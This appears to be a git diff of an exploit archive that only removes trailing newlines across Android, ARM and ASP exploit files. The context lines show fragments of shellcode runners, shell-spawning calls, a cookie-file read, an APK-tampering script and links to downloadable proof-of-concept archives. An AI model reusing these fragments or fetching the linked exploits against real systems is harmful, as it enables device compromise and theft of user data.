+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41353.zip \ No newline at end of file diff --git a/platforms/android/dos/41354.txt b/platforms/android/dos/41354.txt index decafacb0..c4197104c 100755 --- a/platforms/android/dos/41354.txt +++ b/platforms/android/dos/41354.txt @@ -80,4 +80,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41354.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41354.zip \ No newline at end of file diff --git a/platforms/android/dos/41355.txt b/platforms/android/dos/41355.txt index 74aae7670..10ee02d2d 100755 --- a/platforms/android/dos/41355.txt +++ b/platforms/android/dos/41355.txt @@ -97,4 +97,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41355.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41355.zip \ No newline at end of file diff --git a/platforms/android/dos/41981.txt b/platforms/android/dos/41981.txt index 0f9a072f7..e240aabf0 100755 --- a/platforms/android/dos/41981.txt +++ b/platforms/android/dos/41981.txt @@ -79,4 +79,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41981.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41981.zip \ No newline at end of file diff --git a/platforms/android/dos/41982.txt b/platforms/android/dos/41982.txt index 2b51d32ce..64b82f9d1 100755 --- a/platforms/android/dos/41982.txt +++ b/platforms/android/dos/41982.txt @@ -53,4 +53,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41982.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41982.zip \ No newline at end of file diff --git a/platforms/android/dos/41983.txt b/platforms/android/dos/41983.txt index 1d4f0e0d6..1022deee8 100755 --- a/platforms/android/dos/41983.txt +++ b/platforms/android/dos/41983.txt @@ -130,4 +130,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41983.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41983.zip \ No newline at end of file diff --git a/platforms/android/dos/42169.txt b/platforms/android/dos/42169.txt index 9b914f401..b87170d7f 100755 --- a/platforms/android/dos/42169.txt +++ b/platforms/android/dos/42169.txt @@ -61,4 +61,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42169.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42169.zip \ No newline at end of file diff --git a/platforms/android/dos/42170.txt b/platforms/android/dos/42170.txt index 6fea254da..1e5e44da4 100755 --- a/platforms/android/dos/42170.txt +++ b/platforms/android/dos/42170.txt @@ -77,4 +77,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42170.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42170.zip \ No newline at end of file diff --git a/platforms/android/dos/42171.txt b/platforms/android/dos/42171.txt index e24fa018f..5b696378b 100755 --- a/platforms/android/dos/42171.txt +++ b/platforms/android/dos/42171.txt @@ -41,4 +41,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42171.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42171.zip \ No newline at end of file diff --git a/platforms/android/dos/42285.txt b/platforms/android/dos/42285.txt index 9f36b2a49..2841ba622 100755 --- a/platforms/android/dos/42285.txt +++ b/platforms/android/dos/42285.txt @@ -23,4 +23,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42285.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42285.zip \ No newline at end of file diff --git a/platforms/android/local/16098.c b/platforms/android/local/16098.c index 05c2f1b8b..527895c5a 100755 --- a/platforms/android/local/16098.c +++ b/platforms/android/local/16098.c @@ -150,5 +150,4 @@ int main(int argc, char **argv, char **env) "[*] You succeeded if you find /system/bin/rootshell.\n" "[*] GUI might hang/restart meanwhile so be patient.\n"); return 0; -} - +} \ No newline at end of file diff --git a/platforms/android/local/35711.c b/platforms/android/local/35711.c index abe647a32..ef73c541b 100755 --- a/platforms/android/local/35711.c +++ b/platforms/android/local/35711.c @@ -549,4 +549,4 @@ ENTRY(shell_code2) STMFD SP!, {R0} LDMFD SP!, {PC} .byte 0xee, 0xee, 0xee, 0xee -//=========================================shellcode.S end============================================= +//=========================================shellcode.S end============================================= \ No newline at end of file diff --git a/platforms/android/local/39061.txt b/platforms/android/local/39061.txt index 135e50fab..5aa21d674 100755 --- a/platforms/android/local/39061.txt +++ b/platforms/android/local/39061.txt @@ -42,4 +42,4 @@ D/G2M (32190): HttpRequest response body: GET https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a -> - + \ No newline at end of file diff --git a/platforms/android/local/39757.txt b/platforms/android/local/39757.txt index b7866fab8..720ef85ba 100755 --- a/platforms/android/local/39757.txt +++ b/platforms/android/local/39757.txt @@ -6,5 +6,4 @@ Qualcomm's Secure Execution Environment (QSEE) Privilege Escalation Exploit usi Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39757.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39757.zip \ No newline at end of file diff --git a/platforms/android/local/40066.txt b/platforms/android/local/40066.txt index 09bfab40b..59c8fcd4c 100755 --- a/platforms/android/local/40066.txt +++ b/platforms/android/local/40066.txt @@ -227,4 +227,4 @@ the JACK server process. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40066.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40066.zip \ No newline at end of file diff --git a/platforms/android/local/40975.rb b/platforms/android/local/40975.rb index 0a3a7df3d..ee8e7cb11 100755 --- a/platforms/android/local/40975.rb +++ b/platforms/android/local/40975.rb @@ -78,4 +78,4 @@ class MetasploitModule < Msf::Exploit::Local print_status("Waiting #{datastore['WfsDelay']} seconds for payload") end -end +end \ No newline at end of file diff --git a/platforms/android/local/41130.txt b/platforms/android/local/41130.txt index fe21aa485..0d8b35bbd 100755 --- a/platforms/android/local/41130.txt +++ b/platforms/android/local/41130.txt @@ -70,4 +70,4 @@ The high-level flow for executing a function in the kernel is the following: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41130.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41130.zip \ No newline at end of file diff --git a/platforms/android/local/41217.txt b/platforms/android/local/41217.txt index 5c2be2400..02e50b1a2 100755 --- a/platforms/android/local/41217.txt +++ b/platforms/android/local/41217.txt @@ -92,4 +92,4 @@ This issue can be reproduced by simply writing code to any of these memory regio Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41217.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41217.zip \ No newline at end of file diff --git a/platforms/android/local/9477.txt b/platforms/android/local/9477.txt index d2acc6479..bb6e60800 100755 --- a/platforms/android/local/9477.txt +++ b/platforms/android/local/9477.txt @@ -3,4 +3,4 @@ Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernel http://zenthought.org/content/file/android-root-2009-08-16-source Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz) -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/android/remote/15423.html b/platforms/android/remote/15423.html index 319b33a75..2dcbcd977 100755 --- a/platforms/android/remote/15423.html +++ b/platforms/android/remote/15423.html @@ -41,4 +41,4 @@ woot heap(); - + \ No newline at end of file diff --git a/platforms/android/remote/15548.html b/platforms/android/remote/15548.html index 1f19711ab..93614d109 100755 --- a/platforms/android/remote/15548.html +++ b/platforms/android/remote/15548.html @@ -65,5 +65,4 @@ Enjoy! -Twitter account : @ihackbanme - +Twitter account : @ihackbanme \ No newline at end of file diff --git a/platforms/android/remote/16974.html b/platforms/android/remote/16974.html index 9fe9db671..96363e6eb 100755 --- a/platforms/android/remote/16974.html +++ b/platforms/android/remote/16974.html @@ -64,6 +64,4 @@ scode2 += shell

- - - + \ No newline at end of file diff --git a/platforms/android/remote/18446.html b/platforms/android/remote/18446.html index 5a193d655..20944733b 100755 --- a/platforms/android/remote/18446.html +++ b/platforms/android/remote/18446.html @@ -119,4 +119,4 @@ document.body.offsetTop; elem3.normalize(); - + \ No newline at end of file diff --git a/platforms/android/remote/37793.txt b/platforms/android/remote/37793.txt index b814c98fe..4f19e5558 100755 --- a/platforms/android/remote/37793.txt +++ b/platforms/android/remote/37793.txt @@ -22,4 +22,4 @@ Versions prior to Chrome for Android 18.0.1025308 are vulnerable. // read the Cookie file (/sdcard/Download/Cookies.bin) FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin"); ... - } + } \ No newline at end of file diff --git a/platforms/android/remote/38170.txt b/platforms/android/remote/38170.txt index dda6b3636..763d1653a 100755 --- a/platforms/android/remote/38170.txt +++ b/platforms/android/remote/38170.txt @@ -89,4 +89,4 @@ Facebook for Android 1.8.1 is vulnerable; other versions may also be affected. } - + \ No newline at end of file diff --git a/platforms/android/remote/38310.c b/platforms/android/remote/38310.c index d93a2df12..611abddc3 100755 --- a/platforms/android/remote/38310.c +++ b/platforms/android/remote/38310.c @@ -315,4 +315,4 @@ main(int argc, char **argv) execl("/system/bin/sh", "sh", NULL); return 0; -} +} \ No newline at end of file diff --git a/platforms/android/remote/38554.py b/platforms/android/remote/38554.py index b428ffe7e..63364dc7b 100755 --- a/platforms/android/remote/38554.py +++ b/platforms/android/remote/38554.py @@ -49,4 +49,4 @@ msg.attach(part2) s = smtplib.SMTP_SSL(smtp_server) s.login(me, me_password) s.sendmail(me, you, msg.as_string()) -s.quit() +s.quit() \ No newline at end of file diff --git a/platforms/android/remote/38627.sh b/platforms/android/remote/38627.sh index 53466ba65..0836cf0bf 100755 --- a/platforms/android/remote/38627.sh +++ b/platforms/android/remote/38627.sh @@ -35,4 +35,4 @@ for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f cp out.apk ../evil-$APK cd .. rm -rf tmp out -echo "Modified APK: evil-$APK" +echo "Modified APK: evil-$APK" \ No newline at end of file diff --git a/platforms/android/remote/38821.py b/platforms/android/remote/38821.py index df7a81522..177911f22 100755 --- a/platforms/android/remote/38821.py +++ b/platforms/android/remote/38821.py @@ -41,4 +41,4 @@ for name in zin.namelist(): fp.write('\0' * (len(old) - len(new))) zout.close() -zin.close() +zin.close() \ No newline at end of file diff --git a/platforms/android/remote/39640.txt b/platforms/android/remote/39640.txt index cb2007b38..2ad3bb3f6 100755 --- a/platforms/android/remote/39640.txt +++ b/platforms/android/remote/39640.txt @@ -24,4 +24,4 @@ Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosti Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39640.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39640.zip \ No newline at end of file diff --git a/platforms/android/remote/40354.txt b/platforms/android/remote/40354.txt index 3d58d5b11..a2f9bed44 100755 --- a/platforms/android/remote/40354.txt +++ b/platforms/android/remote/40354.txt @@ -156,5 +156,4 @@ bool Parcel::enforceInterface(const String16& interface, Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40354.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40354.zip \ No newline at end of file diff --git a/platforms/android/remote/40874.txt b/platforms/android/remote/40874.txt index b311e8082..d17e81dd4 100755 --- a/platforms/android/remote/40874.txt +++ b/platforms/android/remote/40874.txt @@ -88,4 +88,4 @@ This notification will be of size THREAD_SIZE*2, and will therefore fill up the Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40874.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40874.zip \ No newline at end of file diff --git a/platforms/android/shellcode/38194.c b/platforms/android/shellcode/38194.c index 4e1aeeb0a..dd7c34f30 100755 --- a/platforms/android/shellcode/38194.c +++ b/platforms/android/shellcode/38194.c @@ -241,5 +241,4 @@ int main(void) { (*(void(*) ()) SC) (); return 0; -} - +} \ No newline at end of file diff --git a/platforms/android/webapps/18164.php b/platforms/android/webapps/18164.php index 797c82721..6c0532030 100755 --- a/platforms/android/webapps/18164.php +++ b/platforms/android/webapps/18164.php @@ -118,4 +118,4 @@ switch($_GET["stage"]) { stage0($scripturl); break; } -?> +?> \ No newline at end of file diff --git a/platforms/arm/dos/40182.txt b/platforms/arm/dos/40182.txt index 54c544056..362c3a0b3 100755 --- a/platforms/arm/dos/40182.txt +++ b/platforms/arm/dos/40182.txt @@ -78,5 +78,4 @@ I have attached a completely untested patch that should fix the x86, arm and arm Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40182.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40182.zip \ No newline at end of file diff --git a/platforms/arm/local/31574.c b/platforms/arm/local/31574.c index ddce4a485..e96baecb0 100755 --- a/platforms/arm/local/31574.c +++ b/platforms/arm/local/31574.c @@ -147,4 +147,4 @@ main(int ac, char **av) execve(shell[0], shell, NULL); return EXIT_FAILURE; -} +} \ No newline at end of file diff --git a/platforms/arm/shellcode/14097.c b/platforms/arm/shellcode/14097.c index ccecca7c9..fa1244cce 100755 --- a/platforms/arm/shellcode/14097.c +++ b/platforms/arm/shellcode/14097.c @@ -40,4 +40,4 @@ int main(void) fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/arm/shellcode/14116.txt b/platforms/arm/shellcode/14116.txt index 0a97ad55f..1d221a957 100755 --- a/platforms/arm/shellcode/14116.txt +++ b/platforms/arm/shellcode/14116.txt @@ -54,4 +54,4 @@ int main(void) fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/arm/shellcode/14139.c b/platforms/arm/shellcode/14139.c index 2255d0293..b2d5dd77b 100755 --- a/platforms/arm/shellcode/14139.c +++ b/platforms/arm/shellcode/14139.c @@ -79,5 +79,4 @@ int main(void) fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; -} - +} \ No newline at end of file diff --git a/platforms/arm/shellcode/14190.c b/platforms/arm/shellcode/14190.c index 7856faf3f..ff3d9491e 100755 --- a/platforms/arm/shellcode/14190.c +++ b/platforms/arm/shellcode/14190.c @@ -81,6 +81,4 @@ int main(void) fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; -} - - +} \ No newline at end of file diff --git a/platforms/arm/shellcode/14907.c b/platforms/arm/shellcode/14907.c index d8cd2e6e9..59aa48f23 100755 --- a/platforms/arm/shellcode/14907.c +++ b/platforms/arm/shellcode/14907.c @@ -45,4 +45,4 @@ int main(void) fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/arm/shellcode/15314.asm b/platforms/arm/shellcode/15314.asm index fd64f4c8c..1a84ae2e1 100755 --- a/platforms/arm/shellcode/15314.asm +++ b/platforms/arm/shellcode/15314.asm @@ -110,4 +110,4 @@ add %r1, %sp, $0 /* argv ptr */ add %r2, %sp, $4 /* env ptr */ - svc 0x0090000b + svc 0x0090000b \ No newline at end of file diff --git a/platforms/arm/shellcode/15315.asm b/platforms/arm/shellcode/15315.asm index 9324dc9c9..f07185574 100755 --- a/platforms/arm/shellcode/15315.asm +++ b/platforms/arm/shellcode/15315.asm @@ -115,4 +115,4 @@ add %r1, %sp, $0 /* argv ptr */ add %r2, %sp, $4 /* env ptr */ - svc 0x0090000b + svc 0x0090000b \ No newline at end of file diff --git a/platforms/arm/shellcode/15316.asm b/platforms/arm/shellcode/15316.asm index 7a0b56cb8..5944ccd39 100755 --- a/platforms/arm/shellcode/15316.asm +++ b/platforms/arm/shellcode/15316.asm @@ -96,4 +96,4 @@ Jump into code */ - mov %pc, %r4 + mov %pc, %r4 \ No newline at end of file diff --git a/platforms/arm/shellcode/15317.asm b/platforms/arm/shellcode/15317.asm index 117e92c35..1d41c0fec 100755 --- a/platforms/arm/shellcode/15317.asm +++ b/platforms/arm/shellcode/15317.asm @@ -73,4 +73,4 @@ mov %r1, $0x8900 add %r1, %r1, $0x14 /* SIOCSIFFLAGS */ - svc 0x00900036 + svc 0x00900036 \ No newline at end of file diff --git a/platforms/arm/shellcode/15616.c b/platforms/arm/shellcode/15616.c index 43e297dc3..399beb72d 100755 --- a/platforms/arm/shellcode/15616.c +++ b/platforms/arm/shellcode/15616.c @@ -79,4 +79,4 @@ int main(void) fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/arm/shellcode/21252.asm b/platforms/arm/shellcode/21252.asm index 687a60415..db8aa1a30 100755 --- a/platforms/arm/shellcode/21252.asm +++ b/platforms/arm/shellcode/21252.asm @@ -87,4 +87,4 @@ int main() sc[0x3c], sc[0x3d], sc[0x3e], sc[0x3f], SWAP16(*((unsigned short *)(sc+0x3a)))); return ((int (*)(void))sc)(); -} +} \ No newline at end of file diff --git a/platforms/arm/shellcode/21253.asm b/platforms/arm/shellcode/21253.asm index f2851e7fd..fd1c638d0 100755 --- a/platforms/arm/shellcode/21253.asm +++ b/platforms/arm/shellcode/21253.asm @@ -39,4 +39,4 @@ int main(void) fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/arm/shellcode/21254.asm b/platforms/arm/shellcode/21254.asm index 2d5a48257..ac6689684 100755 --- a/platforms/arm/shellcode/21254.asm +++ b/platforms/arm/shellcode/21254.asm @@ -51,4 +51,4 @@ int main() (*(void(*)()) shellcode)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/arm/shellcode/39496.c b/platforms/arm/shellcode/39496.c index 63b92944b..b0d77ac4a 100755 --- a/platforms/arm/shellcode/39496.c +++ b/platforms/arm/shellcode/39496.c @@ -33,5 +33,4 @@ __asm__ ( "eor r0, r0\n\t" (*(void(*)()) shellcode)(); printf("Failed!\n"); return 0; -} - +} \ No newline at end of file diff --git a/platforms/ashx/webapps/39497.txt b/platforms/ashx/webapps/39497.txt index 0113f15d4..fd47f3401 100755 --- a/platforms/ashx/webapps/39497.txt +++ b/platforms/ashx/webapps/39497.txt @@ -172,4 +172,4 @@ Type: "atToDo" UserActivities: {} $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27" UserNotifications: {} -$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27" +$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27" \ No newline at end of file diff --git a/platforms/asp/remote/15213.pl b/platforms/asp/remote/15213.pl index 1173cbb11..db278870f 100755 --- a/platforms/asp/remote/15213.pl +++ b/platforms/asp/remote/15213.pl @@ -135,4 +135,4 @@ sub makeRequest { } $contentLength = $response->header("Content-Length"); return ($status, $content, $location, $contentLength); -} +} \ No newline at end of file diff --git a/platforms/asp/remote/15265.rb b/platforms/asp/remote/15265.rb index ea5e9c307..4e8e0066e 100755 --- a/platforms/asp/remote/15265.rb +++ b/platforms/asp/remote/15265.rb @@ -639,4 +639,4 @@ rescue Exception => e $stderr.puts "Exploit failed: #{e}" raise if $debugging -end +end \ No newline at end of file diff --git a/platforms/asp/webapps/1010.pl b/platforms/asp/webapps/1010.pl index 7c4b2f3ee..c70120ad0 100755 --- a/platforms/asp/webapps/1010.pl +++ b/platforms/asp/webapps/1010.pl @@ -73,4 +73,4 @@ print "Enjoy ;)\n"; print "\n"; ### EOF ### -# milw0rm.com [2005-05-26] +# milw0rm.com [2005-05-26] \ No newline at end of file diff --git a/platforms/asp/webapps/1011.php b/platforms/asp/webapps/1011.php index 807294640..5ed71dff6 100755 --- a/platforms/asp/webapps/1011.php +++ b/platforms/asp/webapps/1011.php @@ -32,4 +32,4 @@ print ""; } ?> -# milw0rm.com [2005-05-26] +# milw0rm.com [2005-05-26] \ No newline at end of file diff --git a/platforms/asp/webapps/1012.txt b/platforms/asp/webapps/1012.txt index 0dddbffbe..6b1e4d616 100755 --- a/platforms/asp/webapps/1012.txt +++ b/platforms/asp/webapps/1012.txt @@ -35,4 +35,4 @@ size="150"> -----------------End------------------- -# milw0rm.com [2005-05-26] +# milw0rm.com [2005-05-26] \ No newline at end of file diff --git a/platforms/asp/webapps/1015.txt b/platforms/asp/webapps/1015.txt index e37103833..cec5a6b28 100755 --- a/platforms/asp/webapps/1015.txt +++ b/platforms/asp/webapps/1015.txt @@ -34,4 +34,4 @@ firstname : ----------------------------------- Now u can use forgot password to gain passwords! --> -# milw0rm.com [2005-05-27] +# milw0rm.com [2005-05-27] \ No newline at end of file diff --git a/platforms/asp/webapps/10161.txt b/platforms/asp/webapps/10161.txt index 9b025796a..a3536f9f0 100755 --- a/platforms/asp/webapps/10161.txt +++ b/platforms/asp/webapps/10161.txt @@ -15,4 +15,4 @@ they are able to change settings and upload asp and exe files. # Bug discovered by blackenedsecurity # http://blackenedsecurity.blogcu.com # msn: syberhunter@hotmail.com -# From Turkey =) +# From Turkey =) \ No newline at end of file diff --git a/platforms/asp/webapps/10449.txt b/platforms/asp/webapps/10449.txt index ef3491df6..5ea617fa6 100755 --- a/platforms/asp/webapps/10449.txt +++ b/platforms/asp/webapps/10449.txt @@ -12,4 +12,4 @@ #=========================================================== ################################################################# Security Research Team -################################################################### +################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10464.txt b/platforms/asp/webapps/10464.txt index ac7050478..21b149d99 100755 --- a/platforms/asp/webapps/10464.txt +++ b/platforms/asp/webapps/10464.txt @@ -53,4 +53,4 @@ ALERT FR0M THE DARKNESS BY 7h3 REd-D3v!L [~] -[~]I4M:4r48!4N-3XPLO!73r +[~]I4M:4r48!4N-3XPLO!73r \ No newline at end of file diff --git a/platforms/asp/webapps/10465.txt b/platforms/asp/webapps/10465.txt index 45a6bb82f..407893a55 100755 --- a/platforms/asp/webapps/10465.txt +++ b/platforms/asp/webapps/10465.txt @@ -35,4 +35,4 @@ server/SitePalDemo/z_admin_login.asp [~]I4M:4r48!4N-3XPLO!73R [~] -[~]-------------------------------------------------------------------------------- +[~]-------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10473.txt b/platforms/asp/webapps/10473.txt index 356b0efd8..97cbe9b12 100755 --- a/platforms/asp/webapps/10473.txt +++ b/platforms/asp/webapps/10473.txt @@ -53,5 +53,4 @@ R34L R3d-D3V!L WAS h3R3 ((?0NE NAME 7h3Y ALL FA!R ?)) [~]{[(D!R 4ll 0R D!E)]}; -[~]-------------------------------------------------------------------------------- - +[~]-------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10476.txt b/platforms/asp/webapps/10476.txt index c4e4d2bb5..ce71a0f13 100755 --- a/platforms/asp/webapps/10476.txt +++ b/platforms/asp/webapps/10476.txt @@ -51,6 +51,4 @@ uSE y0UR M!ND 70 MAKE MORE THAN ATTACK!NG ;) [~]{[(D!R 4ll 0R D!E)]}; -[~]-------------------------------------------------------------------------------- - - +[~]-------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10496.txt b/platforms/asp/webapps/10496.txt index e03c4656d..a206cda10 100755 --- a/platforms/asp/webapps/10496.txt +++ b/platforms/asp/webapps/10496.txt @@ -55,4 +55,4 @@ GAZA !N our hearts ! [~]{[(D!R 4ll 0R D!E)]}; -[~]-------------------------------------------------------------------------------- +[~]-------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10501.txt b/platforms/asp/webapps/10501.txt index f42faa99f..2b6d2ac5f 100755 --- a/platforms/asp/webapps/10501.txt +++ b/platforms/asp/webapps/10501.txt @@ -48,4 +48,4 @@ GAZA !N our hearts ! [~] !'M 4R48!4N 3XPL0!73R. -[~] {[(D!R 4ll 0R D!E)]}; +[~] {[(D!R 4ll 0R D!E)]}; \ No newline at end of file diff --git a/platforms/asp/webapps/10502.txt b/platforms/asp/webapps/10502.txt index 37108d93e..03b48a9b7 100755 --- a/platforms/asp/webapps/10502.txt +++ b/platforms/asp/webapps/10502.txt @@ -44,4 +44,4 @@ GAZA !N our hearts ! [~] !'M 4R48!4N 3XPL0!73R. -[~] {[(D!R 4ll 0R D!E)]}; +[~] {[(D!R 4ll 0R D!E)]}; \ No newline at end of file diff --git a/platforms/asp/webapps/10503.txt b/platforms/asp/webapps/10503.txt index ecfe46ce4..a1bba9b11 100755 --- a/platforms/asp/webapps/10503.txt +++ b/platforms/asp/webapps/10503.txt @@ -48,5 +48,4 @@ just let your m1nd breath ;) [~] !'M 4R48!4N 3XPL0!73R. -[~] {[(D!R 4ll 0R D!E)]}; - +[~] {[(D!R 4ll 0R D!E)]}; \ No newline at end of file diff --git a/platforms/asp/webapps/10504.txt b/platforms/asp/webapps/10504.txt index ea2f9d48f..155e27798 100755 --- a/platforms/asp/webapps/10504.txt +++ b/platforms/asp/webapps/10504.txt @@ -48,4 +48,4 @@ just let your m1nd breath ;) [~] !'M 4R48!4N 3XPL0!73R. -[~] {[(D!R 4ll 0R D!E)]}; +[~] {[(D!R 4ll 0R D!E)]}; \ No newline at end of file diff --git a/platforms/asp/webapps/10507.txt b/platforms/asp/webapps/10507.txt index 9ae45549f..123ac6c4b 100755 --- a/platforms/asp/webapps/10507.txt +++ b/platforms/asp/webapps/10507.txt @@ -50,4 +50,4 @@ just let your m1nd breath ;) [~] {[(D!R 4ll 0R D!E)]}; -[~]-------------------------------------------------------------------------------- +[~]-------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10520.txt b/platforms/asp/webapps/10520.txt index 08eeb4b78..0b84cafe1 100755 --- a/platforms/asp/webapps/10520.txt +++ b/platforms/asp/webapps/10520.txt @@ -52,4 +52,4 @@ just let your m1nd breath ;) [~] {[(D!R 4ll 0R D!E)]}; -[~]-------------------------------------------------------------------------------- +[~]-------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/10525.txt b/platforms/asp/webapps/10525.txt index 9795657d8..9cba8cea3 100755 --- a/platforms/asp/webapps/10525.txt +++ b/platforms/asp/webapps/10525.txt @@ -36,5 +36,4 @@ # [#]------------------------------------------------------------------------------------------[#] -#EOF - +#EOF \ No newline at end of file diff --git a/platforms/asp/webapps/10558.txt b/platforms/asp/webapps/10558.txt index 3cc8b4769..9826abfa6 100755 --- a/platforms/asp/webapps/10558.txt +++ b/platforms/asp/webapps/10558.txt @@ -30,4 +30,4 @@ Author: ViRuSMaN <- -########################################################################### +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10573.txt b/platforms/asp/webapps/10573.txt index 081041064..c7cd7da6a 100755 --- a/platforms/asp/webapps/10573.txt +++ b/platforms/asp/webapps/10573.txt @@ -66,5 +66,4 @@ Thanks You: eXceptioN,CodeInside -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10637.txt b/platforms/asp/webapps/10637.txt index 3fd382f55..5c271c1f1 100755 --- a/platforms/asp/webapps/10637.txt +++ b/platforms/asp/webapps/10637.txt @@ -28,5 +28,4 @@ Author: ViRuSMaN <- -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10638.txt b/platforms/asp/webapps/10638.txt index f2108b20a..651f388c6 100755 --- a/platforms/asp/webapps/10638.txt +++ b/platforms/asp/webapps/10638.txt @@ -29,4 +29,4 @@ Author: ViRuSMaN <- -########################################################################### +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10639.txt b/platforms/asp/webapps/10639.txt index 5a51a39da..e539486a7 100755 --- a/platforms/asp/webapps/10639.txt +++ b/platforms/asp/webapps/10639.txt @@ -28,6 +28,4 @@ Author: ViRuSMaN <- -########################################################################### - - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10686.txt b/platforms/asp/webapps/10686.txt index 3b64132ef..92d46f9d8 100755 --- a/platforms/asp/webapps/10686.txt +++ b/platforms/asp/webapps/10686.txt @@ -70,5 +70,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZvA -########################################################################### - +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/1070.pl b/platforms/asp/webapps/1070.pl index b33dbb7d8..1e0864bdc 100755 --- a/platforms/asp/webapps/1070.pl +++ b/platforms/asp/webapps/1070.pl @@ -49,4 +49,4 @@ print "Username: trapset\n"; print "Password: trapset\n\n"; -# milw0rm.com [2005-06-27] +# milw0rm.com [2005-06-27] 